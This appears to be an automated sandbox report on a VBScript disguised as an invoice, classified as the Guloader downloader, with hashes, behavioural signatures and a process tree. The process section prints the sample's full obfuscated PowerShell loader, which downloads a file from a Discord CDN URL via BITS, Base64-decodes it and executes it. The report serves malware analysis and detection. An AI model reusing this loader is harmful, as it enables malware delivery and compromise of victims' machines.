Analysis
-
max time kernel
139s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
07/08/2023, 18:47
Static task
static1
Behavioral task
behavioral1
Sample
INVOICE2023310643_Packing_List__CMR.vbs
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
INVOICE2023310643_Packing_List__CMR.vbs
Resource
win10v2004-20230703-en
General
-
Target
INVOICE2023310643_Packing_List__CMR.vbs
-
Size
16KB
-
MD5
3739a1cb04d797a12296400184cb660e
-
SHA1
61f01364e48cbf9af71598a865e2d966aa2f100b
-
SHA256
d327a71665c7df97c34a5246c79c5ce6a4deccf5e470e048e6ef6c978bb9128a
-
SHA512
b511d34ad8356adf2ad47c524172e4f05ff315e57c1a9c052026291ae3921cb493a9477825bb3fa987917e4db47265c332c39351c6c65dc8ac98126395603dcb
-
SSDEEP
384:eMer0TdYUAIZA7fkoyRNJxyYLgLIUENbI2cKrI:evr0eIzhLsmbI2RrI
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 4404 WScript.exe -
Checks QEMU agent file 2 TTPs 1 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4728 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3224 4728 WerFault.exe 91 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2364 powershell.exe 2364 powershell.exe 4728 powershell.exe 4728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4404 wrote to memory of 2364 4404 WScript.exe 89 PID 4404 wrote to memory of 2364 4404 WScript.exe 89 PID 2364 wrote to memory of 4728 2364 powershell.exe 91 PID 2364 wrote to memory of 4728 2364 powershell.exe 91 PID 2364 wrote to memory of 4728 2364 powershell.exe 91
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE2023310643_Packing_List__CMR.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 17244⤵
- Program crash
PID:3224
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4728 -ip 47281⤵PID:3952
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82